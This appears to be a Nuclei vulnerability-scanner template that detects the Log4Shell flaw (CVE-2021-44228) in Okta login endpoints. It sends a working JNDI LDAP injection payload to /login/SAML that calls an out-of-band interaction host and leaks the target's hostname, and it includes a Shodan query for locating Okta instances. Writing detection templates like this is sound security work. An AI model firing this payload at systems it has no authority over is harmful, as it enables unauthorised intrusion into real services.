61 lines
2.1 KiB
YAML
61 lines
2.1 KiB
YAML
id: okta-log4j-rce
|
|
|
|
info:
|
|
name: Okta - Remote Code Execution (Apache Log4j)
|
|
author: shaikhyaser
|
|
severity: critical
|
|
description: |
|
|
Okta is susceptible to Log4j JNDI remote code execution. Okta provides cloud software that helps companies manage and secure user authentication into applications, and for developers to build identity controls into applications, website web services and devices.
|
|
reference:
|
|
- https://sec.okta.com/articles/2021/12/log4shell
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
|
cvss-score: 10
|
|
cve-id: CVE-2021-44228
|
|
cwe-id: CWE-77
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: title:"Okta"
|
|
tags: cve,cve2021,rce,jndi,log4j,okta,oast,kev
|
|
variables:
|
|
rand1: '{{rand_int(111, 999)}}'
|
|
rand2: '{{rand_int(111, 999)}}'
|
|
str: "{{rand_base(5)}}"
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /login/SAML?=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}} HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: interactsh_protocol #Confirms the DNS Interaction
|
|
words:
|
|
- "dns"
|
|
|
|
- type: regex
|
|
part: interactsh_request
|
|
regex:
|
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' #Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
|
|
|
extractors:
|
|
- type: kval
|
|
kval:
|
|
- interactsh_ip #Print remote interaction IP in output
|
|
|
|
- type: regex
|
|
group: 2
|
|
regex:
|
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' #Print injection point in output
|
|
part: interactsh_request
|
|
|
|
- type: regex
|
|
group: 1
|
|
regex:
|
|
- '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' #Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
|
|
part: interactsh_request
|
|
|
|
# digest: 4b0a00483046022100bc882474f76134d6af0f7b38c9d20cbb5d3917f7460342c741912ed616dcbc07022100cb71c9543aafc358c92566c24ea9387e18e8c1f88b6a33d1d4db42e2df7c8ec0:922c64590222798bb761d5b6d8e72950
|